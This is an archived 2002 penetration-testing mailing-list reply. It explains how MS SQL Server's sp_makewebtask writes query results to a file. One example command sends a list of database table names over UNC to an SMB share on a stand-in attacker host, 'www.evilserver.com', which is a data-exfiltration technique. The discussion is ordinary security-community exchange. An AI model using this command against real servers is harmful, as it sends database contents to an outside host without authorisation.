Penetration Testing mailing list archives

Re: Send output to file in SQL

From: "Kevin Spett" <kspett () spidynamics com>
Date: Fri, 15 Mar 2002 14:28:22 -0800

I'm not sure if you meant "stored procedure" when you said "extended
procedure".  If you didn't, here's on answer.

sp_makewebtask works great for this. It builds an html table with the output
of your query.  It's installed by default without any kind of access
control.  It works like this:

    sp_makewebtask 'c:\inetpub\wwwroot\sqloutput.html', 'SELECT name FROM
sysobjects WHERE xtype=''U'''
    (I'm pretty sure in SQL Server to use quoted parameters inside of quotes
you double single quotes, not double quotes.)

You can even specify a UNC path for the output file, like this:
    sp_makewebtask '\\www.evilserver.com\publicshare\sqloutput.html',
'SELECT name FROM sysobjects WHERE xtype=''U'''
The directory "publicshare" needs to be a wide open SMB share... if any kind
of authentication challenge is present, the file won't be recieved.


Hope this helps.

Kevin Spett
Web Application Security Ninja
SPI Dynamics, Inc.

----- Original Message -----
From: "Alex Harasic" <aharasic () terra cl>
To: <pen-test () securityfocus com>
Sent: Wednesday, March 13, 2002 9:05 AM
Subject: Send output to file in SQL



Hi, I've been looking around for ways to send output
to a file in a sql query. I know there is one for mySQL
but not for msSQL.

Anyone knows a way to send the output in a query
without using extended procedures?


Alex S. Harasic
aharasic () terra cl

--------------------------------------------------------------------------

--

This list is provided by the SecurityFocus Security Intelligence Alert

(SIA)

Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please

see:

https://alerts.securityfocus.com/



----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Current thread:

Send output to file in SQL Alex Harasic (Mar 15)
- Re: Send output to file in SQL Kevin Spett (Mar 17)
- Re: Send output to file in SQL Narayana Kondreddi (Mar 17)
- <Possible follow-ups>
- RE: Send output to file in SQL Henry Dixon (Mar 17)
- RE: Send output to file in SQL Jonah Kowall (Mar 17)
  - Re: Send output to file in SQL Alex S. Harasic (Mar 21)